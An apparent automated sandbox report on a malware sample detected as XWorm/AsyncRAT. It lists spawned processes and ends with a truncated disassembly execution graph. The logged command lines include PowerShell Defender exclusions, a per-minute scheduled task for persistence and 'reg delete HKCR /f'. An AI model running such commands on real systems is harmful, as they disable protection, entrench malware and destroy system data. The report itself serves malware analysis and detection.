                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BootstrapperV21.exe'
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:13:09:07
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:18
                                                                                        Start time:13:09:14
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 7376 -s 2148
                                                                                        Imagebase:0x7ff75a2a0000
                                                                                        File size:570'736 bytes
                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:20
                                                                                        Start time:13:09:19
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\explorer.exe'
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:21
                                                                                        Start time:13:09:19
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:22
                                                                                        Start time:13:09:34
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                                                                        Imagebase:0x7ff7be880000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:23
                                                                                        Start time:13:09:34
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:25
                                                                                        Start time:13:10:00
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\schtasks.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\user\AppData\Roaming\explorer.exe"
                                                                                        Imagebase:0x7ff76c880000
                                                                                        File size:235'008 bytes
                                                                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:26
                                                                                        Start time:13:10:00
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:27
                                                                                        Start time:13:10:00
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                        Imagebase:0xb90000
                                                                                        File size:78'848 bytes
                                                                                        MD5 hash:B3A1A7EF45C3A920F515ADC541EE75F4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\explorer.exe, Author: ditekSHen
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 88%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:28
                                                                                        Start time:13:10:10
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\explorer.exe"
                                                                                        Imagebase:0x4f0000
                                                                                        File size:78'848 bytes
                                                                                        MD5 hash:B3A1A7EF45C3A920F515ADC541EE75F4
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:29
                                                                                        Start time:13:10:18
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\explorer.exe"
                                                                                        Imagebase:0x6d0000
                                                                                        File size:78'848 bytes
                                                                                        MD5 hash:B3A1A7EF45C3A920F515ADC541EE75F4
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:30
                                                                                        Start time:13:11:01
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                        Imagebase:0x3f0000
                                                                                        File size:78'848 bytes
                                                                                        MD5 hash:B3A1A7EF45C3A920F515ADC541EE75F4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:31
                                                                                        Start time:13:11:33
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7e52b0000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:32
                                                                                        Start time:13:12:00
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                        Imagebase:0x970000
                                                                                        File size:78'848 bytes
                                                                                        MD5 hash:B3A1A7EF45C3A920F515ADC541EE75F4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:33
                                                                                        Start time:13:12:06
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\voosiq.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\voosiq.exe"
                                                                                        Imagebase:0x7ff789db0000
                                                                                        File size:2'638'132 bytes
                                                                                        MD5 hash:BD950F6C677CD5E6C0D39FE8E6543E37
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 58%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:34
                                                                                        Start time:13:12:06
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Users\user\AppData\Local\Temp\TrojanXD.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\TrojanXD.exe"
                                                                                        Imagebase:0x2bf9cd80000
                                                                                        File size:14'848 bytes
                                                                                        MD5 hash:9776B41CC11329E32CA35A161F0AF774
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Avira
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 79%, ReversingLabs
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:35
                                                                                        Start time:13:12:06
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\script.vbs"
                                                                                        Imagebase:0x7ff7334f0000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:36
                                                                                        Start time:13:12:07
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /k reg delete HKCR /f
                                                                                        Imagebase:0x7ff646d40000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:37
                                                                                        Start time:13:12:07
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6d64d0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:38
                                                                                        Start time:13:12:07
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\reg.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:reg delete HKCR /f
                                                                                        Imagebase:0x7ff7915c0000
                                                                                        File size:77'312 bytes
                                                                                        MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:39
                                                                                        Start time:13:12:08
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe" -ServerName:Microsoft.ZuneMusic.AppX48dcrcgzqqdshm3kf61t0cm5e9pyd6h6.mca
                                                                                        Imagebase:0x7ff7dfb20000
                                                                                        File size:23'140'864 bytes
                                                                                        MD5 hash:F963F75C0AD152437E10D656A00793A3
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:47
                                                                                        Start time:13:13:00
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Windows\System32\WerFault.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\WerFault.exe -u -p 6524 -s 1264
                                                                                        Imagebase:0x7ff6e1b10000
                                                                                        File size:570'736 bytes
                                                                                        MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:48
                                                                                        Start time:13:13:00
                                                                                        Start date:13/10/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Users\user\AppData\Roaming\explorer.exe
                                                                                        Imagebase:0x7b0000
                                                                                        File size:78'848 bytes
                                                                                        MD5 hash:B3A1A7EF45C3A920F515ADC541EE75F4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:false

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:11.7%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:26%
                                                                                          Total number of Nodes:2000
                                                                                          Total number of Limit Nodes:33
                                                                                          execution_graph 25978 7ff6373c1491 25980 7ff6373c13c9 25978->25980 25981 7ff6373c1900 25980->25981 26007 7ff6373c1558 25981->26007 25984 7ff6373c19b4 25988 7ff6373c1a3d LoadLibraryExA 25984->25988 25989 7ff6373c1b85 25984->25989 25991 7ff6373c1aa9 25984->25991 25996 7ff6373c1abd 25984->25996 25985 7ff6373c198b 25986 7ff6373c1868 DloadReleaseSectionWriteAccess 6 API calls 25985->25986 25987 7ff6373c1998 RaiseException 25986->25987 26000 7ff6373c1bb5 25987->26000 25990 7ff6373c1a54 GetLastError 25988->25990 25988->25991 26015 7ff6373c1868 25989->26015 25993 7ff6373c1a7e 25990->25993 25994 7ff6373c1a69 25990->25994 25995 7ff6373c1ab4 FreeLibrary 25991->25995 25991->25996 25992 7ff6373c1b1b GetProcAddress 25992->25989 25999 7ff6373c1b30 GetLastError 25992->25999 25998 7ff6373c1868 DloadReleaseSectionWriteAccess 6 API calls 25993->25998 25994->25991 25994->25993 25995->25996 25996->25989 25996->25992 26001 7ff6373c1a8b RaiseException 25998->26001 26002 7ff6373c1b45 25999->26002 26000->25980 26001->26000 26002->25989 26003 7ff6373c1868 DloadReleaseSectionWriteAccess 6 API calls 26002->26003 26004 7ff6373c1b67 RaiseException 26003->26004 26005 7ff6373c1558 _com_raise_error 6 API calls 26004->26005 26006 7ff6373c1b81 26005->26006 26006->25989 26008 7ff6373c156e 26007->26008 26014 7ff6373c15d3 26007->26014 26023 7ff6373c1604 26008->26023 26011 7ff6373c15ce 26013 7ff6373c1604 DloadReleaseSectionWriteAccess 3 API calls 26011->26013 26013->26014 26014->25984 26014->25985 26016 7ff6373c1878 26015->26016 26022 7ff6373c18d1 26015->26022 26017 7ff6373c1604 DloadReleaseSectionWriteAccess 3 API calls 26016->26017 26018 7ff6373c187d 26017->26018 26019 7ff6373c18cc 26018->26019 26020 7ff6373c17d8 DloadProtectSection 3 API calls 26018->26020 26021 7ff6373c1604 DloadReleaseSectionWriteAccess 3 API calls 26019->26021 26020->26019 26021->26022 26022->26000 26024 7ff6373c161f 26023->26024 26025 7ff6373c1573 26023->26025 26024->26025 26026 7ff6373c1624 GetModuleHandleW 26024->26026 26025->26011 26030 7ff6373c17d8 26025->26030 26027 7ff6373c163e GetProcAddress 26026->26027 26028 7ff6373c1639 26026->26028 26027->26028 26029 7ff6373c1653 GetProcAddress 26027->26029 26028->26025 26029->26028 26032 7ff6373c17fa DloadProtectSection 26030->26032 26031 7ff6373c1802 26031->26011 26032->26031 26033 7ff6373c183a VirtualProtect 26032->26033 26035 7ff6373c16a4 VirtualQuery GetSystemInfo 26032->26035 26033->26031 26035->26033 26036 7ff6373c20f0 26037 7ff6373c2106 _com_error::_com_error 26036->26037 26042 7ff6373c4078 26037->26042 26039 7ff6373c2117 26040 7ff6373c1900 _com_raise_error 14 API calls 26039->26040 26041 7ff6373c2163 26040->26041 26043 7ff6373c40b4 RtlPcToFileHeader 26042->26043 26045 7ff6373c4097 26042->26045 26044 7ff6373c40db RaiseException 26043->26044 26046 7ff6373c40cc 26043->26046 26044->26039 26045->26043 26046->26044 26047 7ff6373bb190 26390 7ff63739255c 26047->26390 26049 7ff6373bb1db 26050 7ff6373bb1ef 26049->26050 26051 7ff6373bbe93 26049->26051 26200 7ff6373bb20c 26049->26200 26054 7ff6373bb1ff 26050->26054 26055 7ff6373bb2db 26050->26055 26050->26200 26675 7ff6373bf390 26051->26675 26059 7ff6373bb2a9 26054->26059 26060 7ff6373bb207 26054->26060 26062 7ff6373bb391 26055->26062 26067 7ff6373bb2f5 26055->26067 26057 7ff6373bbec9 26064 7ff6373bbef0 GetDlgItem SendMessageW 26057->26064 26065 7ff6373bbed5 SendDlgItemMessageW 26057->26065 26058 7ff6373bbeba SendMessageW 26058->26057 26066 7ff6373bb2cb EndDialog 26059->26066 26059->26200 26070 7ff6373aaae0 48 API calls 26060->26070 26060->26200 26398 7ff6373922bc GetDlgItem 26062->26398 26694 7ff6373a62dc GetCurrentDirectoryW 26064->26694 26065->26064 26066->26200 26071 7ff6373aaae0 48 API calls 26067->26071 26073 7ff6373bb236 26070->26073 26074 7ff6373bb313 SetDlgItemTextW 26071->26074 26072 7ff6373bbf47 GetDlgItem 26704 7ff637392520 26072->26704 26708 7ff637391ec4 34 API calls _handle_error 26073->26708 26078 7ff6373bb326 26074->26078 26077 7ff6373bb408 GetDlgItem 26082 7ff6373bb44f SetFocus 26077->26082 26083 7ff6373bb422 SendMessageW SendMessageW 26077->26083 26084 7ff6373bb340 GetMessageW 26078->26084 26078->26200 26081 7ff6373bb246 26088 7ff6373bb25c 26081->26088 26709 7ff63739250c 26081->26709 26085 7ff6373bb465 26082->26085 26086 7ff6373bb4f2 26082->26086 26083->26082 26090 7ff6373bb35e IsDialogMessageW 26084->26090 26084->26200 26091 7ff6373aaae0 48 API calls 26085->26091 26412 7ff637398d04 26086->26412 26102 7ff6373bc363 26088->26102 26088->26200 26090->26078 26097 7ff6373bb373 TranslateMessage DispatchMessageW 26090->26097 26098 7ff6373bb46f 26091->26098 26092 7ff6373bbcc5 26099 7ff6373aaae0 48 API calls 26092->26099 26093 7ff637391fa0 31 API calls 26093->26200 26096 7ff6373bb52c 26422 7ff6373bef80 26096->26422 26097->26078 26712 7ff63739129c 26098->26712 26103 7ff6373bbcd6 SetDlgItemTextW 26099->26103 26769 7ff6373c7904 26102->26769 26107 7ff6373aaae0 48 API calls 26103->26107 26113 7ff6373bbd08 26107->26113 26128 7ff63739129c 33 API calls 26113->26128 26114 7ff6373bc368 26123 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26114->26123 26117 7ff6373bb498 26121 7ff6373bf0a4 24 API calls 26117->26121 26126 7ff6373bb4a5 26121->26126 26129 7ff6373bc36e 26123->26129 26126->26114 26143 7ff6373bb4e8 26126->26143 26161 7ff6373bbd31 26128->26161 26141 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26129->26141 26140 7ff6373bbdda 26145 7ff6373aaae0 48 API calls 26140->26145 26146 7ff6373bc374 26141->26146 26142 7ff6373bb5ec 26154 7ff6373bb61a 26142->26154 26723 7ff6373a32a8 26142->26723 26143->26142 26722 7ff6373bfa80 33 API calls 2 library calls 26143->26722 26156 7ff6373bbde4 26145->26156 26164 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26146->26164 26149 7ff637391fa0 31 API calls 26159 7ff6373bb586 26149->26159 26460 7ff6373a2f58 26154->26460 26177 7ff63739129c 33 API calls 26156->26177 26159->26129 26159->26143 26161->26140 26166 7ff63739129c 33 API calls 26161->26166 26171 7ff6373bc37a 26164->26171 26172 7ff6373bbd7f 26166->26172 26182 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26171->26182 26178 7ff6373aaae0 48 API calls 26172->26178 26175 7ff6373bb634 GetLastError 26176 7ff6373bb64c 26175->26176 26472 7ff6373a7fc4 26176->26472 26181 7ff6373bbe0d 26177->26181 26184 7ff6373bbd8a 26178->26184 26180 7ff6373bb60e 26726 7ff6373b9d90 12 API calls _handle_error 26180->26726 26197 7ff63739129c 33 API calls 26181->26197 26188 7ff6373bc380 26182->26188 26189 7ff637391150 33 API calls 26184->26189 26198 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26188->26198 26193 7ff6373bbda2 26189->26193 26191 7ff6373bb65e 26195 7ff6373bb665 GetLastError 26191->26195 26196 7ff6373bb674 26191->26196 26756 7ff637392034 26193->26756 26195->26196 26203 7ff6373bb72b 26196->26203 26205 7ff6373bb68b GetTickCount 26196->26205 26292 7ff6373bb71c 26196->26292 26201 7ff6373bbe4e 26197->26201 26202 7ff6373bc386 26198->26202 26760 7ff6373c2320 26200->26760 26217 7ff637391fa0 31 API calls 26201->26217 26206 7ff63739255c 61 API calls 26202->26206 26207 7ff6373bba50 26203->26207 26727 7ff6373a6454 26203->26727 26475 7ff637394228 26205->26475 26210 7ff6373bc3e4 26206->26210 26215 7ff6373bb3b1 EndDialog 26207->26215 26751 7ff63739bd0c 33 API calls 26207->26751 26208 7ff6373bbdbe 26213 7ff637391fa0 31 API calls 26208->26213 26218 7ff6373bc3e8 26210->26218 26226 7ff6373bc489 GetDlgItem SetFocus 26210->26226 26240 7ff6373bc3fd 26210->26240 26221 7ff6373bbdcc 26213->26221 26250 7ff6373bb3da 26215->26250 26225 7ff6373bbe78 26217->26225 26227 7ff6373c2320 _handle_error 8 API calls 26218->26227 26220 7ff6373bb74e 26739 7ff6373ab914 102 API calls 26220->26739 26229 7ff637391fa0 31 API calls 26221->26229 26223 7ff6373bbb79 26237 7ff6373aaae0 48 API calls 26223->26237 26224 7ff6373bba75 26752 7ff637391150 26224->26752 26233 7ff637391fa0 31 API calls 26225->26233 26230 7ff6373bc4ba 26226->26230 26234 7ff6373bca97 26227->26234 26229->26140 26244 7ff63739129c 33 API calls 26230->26244 26231 7ff6373bb6ba 26485 7ff637391fa0 26231->26485 26239 7ff6373bbe83 26233->26239 26235 7ff6373bb768 26243 7ff6373ada98 48 API calls 26235->26243 26246 7ff6373bbba7 SetDlgItemTextW 26237->26246 26238 7ff6373bba8a 26247 7ff6373aaae0 48 API calls 26238->26247 26248 7ff637391fa0 31 API calls 26239->26248 26240->26218 26241 7ff6373bc434 SendDlgItemMessageW 26240->26241 26251 7ff6373bc454 26241->26251 26252 7ff6373bc45d EndDialog 26241->26252 26253 7ff6373bb7aa GetCommandLineW 26243->26253 26254 7ff6373bc4cc 26244->26254 26245 7ff6373bb6c8 26490 7ff6373a2134 26245->26490 26255 7ff637392534 26246->26255 26249 7ff6373bba97 26247->26249 26248->26250 26257 7ff637391150 33 API calls 26249->26257 26250->26093 26251->26252 26252->26218 26258 7ff6373bb84f 26253->26258 26259 7ff6373bb869 26253->26259 26774 7ff6373a80d8 33 API calls 26254->26774 26256 7ff6373bbbc5 SetDlgItemTextW GetDlgItem 26255->26256 26261 7ff6373bbbf0 GetWindowLongPtrW SetWindowLongPtrW 26256->26261 26262 7ff6373bbc13 26256->26262 26263 7ff6373bbaaa 26257->26263 26740 7ff6373920b0 26258->26740 26744 7ff6373bab54 33 API calls _handle_error 26259->26744 26261->26262 26510 7ff6373bce88 26262->26510 26268 7ff637391fa0 31 API calls 26263->26268 26264 7ff6373bc4e0 26269 7ff63739250c SetDlgItemTextW 26264->26269 26275 7ff6373bbab5 26268->26275 26277 7ff6373bc4f4 26269->26277 26270 7ff6373bb87a 26745 7ff6373bab54 33 API calls _handle_error 26270->26745 26272 7ff6373bb6f5 GetLastError 26273 7ff6373bb704 26272->26273 26506 7ff6373a204c 26273->26506 26281 7ff637391fa0 31 API calls 26275->26281 26286 7ff6373bc526 SendDlgItemMessageW FindFirstFileW 26277->26286 26280 7ff6373bce88 160 API calls 26284 7ff6373bbc3c 26280->26284 26285 7ff6373bbac3 26281->26285 26282 7ff6373bb88b 26746 7ff6373bab54 33 API calls _handle_error 26282->26746 26660 7ff6373bf974 26284->26660 26296 7ff6373aaae0 48 API calls 26285->26296 26290 7ff6373bc57b 26286->26290 26383 7ff6373bca04 26286->26383 26301 7ff6373aaae0 48 API calls 26290->26301 26291 7ff6373bb89c 26747 7ff6373ab9b4 102 API calls 26291->26747 26292->26203 26292->26223 26295 7ff6373bce88 160 API calls 26312 7ff6373bbc6a 26295->26312 26300 7ff6373bbadb 26296->26300 26297 7ff6373bb8b3 26748 7ff6373bfbdc 33 API calls 26297->26748 26298 7ff6373bca81 26298->26218 26299 7ff6373bcaa9 26303 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26299->26303 26313 7ff63739129c 33 API calls 26300->26313 26305 7ff6373bc59e 26301->26305 26307 7ff6373bcaae 26303->26307 26304 7ff6373bbc96 26674 7ff637392298 GetDlgItem EnableWindow 26304->26674 26315 7ff63739129c 33 API calls 26305->26315 26306 7ff6373bb8d2 CreateFileMappingW 26309 7ff6373bb911 MapViewOfFile 26306->26309 26310 7ff6373bb953 ShellExecuteExW 26306->26310 26316 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26307->26316 26749 7ff6373c3640 26309->26749 26330 7ff6373bb974 26310->26330 26312->26304 26317 7ff6373bce88 160 API calls 26312->26317 26325 7ff6373bbb04 26313->26325 26314 7ff6373bb3f5 26314->26092 26314->26215 26318 7ff6373bc5cd 26315->26318 26319 7ff6373bcab4 26316->26319 26317->26304 26320 7ff637391150 33 API calls 26318->26320 26323 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26319->26323 26321 7ff6373bc5e8 26320->26321 26775 7ff63739e164 33 API calls 2 library calls 26321->26775 26322 7ff6373bb9c3 26331 7ff6373bb9ef 26322->26331 26332 7ff6373bb9dc UnmapViewOfFile CloseHandle 26322->26332 26327 7ff6373bcaba 26323->26327 26324 7ff6373bbb5a 26328 7ff637391fa0 31 API calls 26324->26328 26325->26171 26325->26324 26335 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26327->26335 26328->26215 26329 7ff6373bc5ff 26333 7ff637391fa0 31 API calls 26329->26333 26330->26322 26337 7ff6373bb9b1 Sleep 26330->26337 26331->26146 26334 7ff6373bba25 26331->26334 26332->26331 26336 7ff6373bc60c 26333->26336 26339 7ff637391fa0 31 API calls 26334->26339 26338 7ff6373bcac0 26335->26338 26336->26307 26341 7ff637391fa0 31 API calls 26336->26341 26337->26322 26337->26330 26342 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26338->26342 26340 7ff6373bba42 26339->26340 26343 7ff637391fa0 31 API calls 26340->26343 26344 7ff6373bc673 26341->26344 26345 7ff6373bcac6 26342->26345 26343->26207 26346 7ff63739250c SetDlgItemTextW 26344->26346 26348 7ff6373c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26345->26348 26347 7ff6373bc687 FindClose 26346->26347 26349 7ff6373bc6a3 26347->26349 26350 7ff6373bc797 SendDlgItemMessageW 26347->26350 26351 7ff6373bcacc 26348->26351 26776 7ff6373ba2cc 10 API calls _handle_error 26349->26776 26352 7ff6373bc7cb 26350->26352 26355 7ff6373aaae0 48 API calls 26352->26355 26354 7ff6373bc6c6 26356 7ff6373aaae0 48 API calls 26354->26356 26357 7ff6373bc7d8 26355->26357 26358 7ff6373bc6cf 26356->26358 26360 